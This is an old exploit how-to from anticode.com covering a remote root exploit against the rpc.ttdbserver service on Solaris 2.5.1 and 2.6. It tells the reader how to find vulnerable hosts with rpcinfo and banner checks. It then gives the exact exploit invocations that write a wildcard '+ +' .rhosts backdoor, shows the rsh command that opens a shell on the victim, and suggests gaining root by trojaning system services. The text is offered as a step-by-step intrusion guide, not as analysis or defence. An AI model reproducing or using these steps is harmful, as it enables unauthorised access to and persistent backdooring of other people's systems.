
==============================================================================
  rpc.ttdbserver remote exploit usage notes
  chris@anticode.com   April 26th 1999.
  http://www.anticode.com
==============================================================================

  This is a how-to for use with the ttdbserver remote exploit available on
  www.anticode.com under Solaris 2.6 exploits. This how-to is specifically
  for use when exploiting Solaris 2.5.1 and 2.6 machines.


  Finding vulnerable systems :

  To identify a vulnerable Solaris host, simply rpcinfo -p <host> and look
  for an RPC service running with the program number 100083, because the
  /etc/rpc file under Solaris doesn't associate the program number 100083
  with any services as such, a program name won't be listed.

  Check the machine is running Solaris 2.5.1 or 2.6 by checking the FTP,
  Sendmail and Telnet banners.


  Compiling the exploit :

  A precompiled version of the exploit is available on www.anticode.com,
  although it can only be run from machines running Solaris 2.5.1. If
  you want to compile the exploit from the source code, read the comments.


  Using the exploit :

  If the target is running Solaris 2.5.1 you can run a command remotely
  as root (setting up an .rhosts file in this case) using this method..


    # ./ttdb -k victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # ./ttdb victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # rsh -l bin victim.here.com csh -i
    victim% whoami
    bin
    victim%


  From there, you can easily obtain root by trojaning a service in the
  /usr/sbin directory (such as in.rshd or in.rlogind).


  If the target is running Solaris 2.6, you can repeat the method, simply
  add a '-6' argument to the second command, like so..


    # ./ttdb -k victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # ./ttdb -6 victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # rsh -l bin victim.here.com csh -i
    victim% whoami
    bin
    victim%


  And that's really all there is to it! There are ways of setting up
  rootshells running on ports and the like.. which we may address at
  a later date.
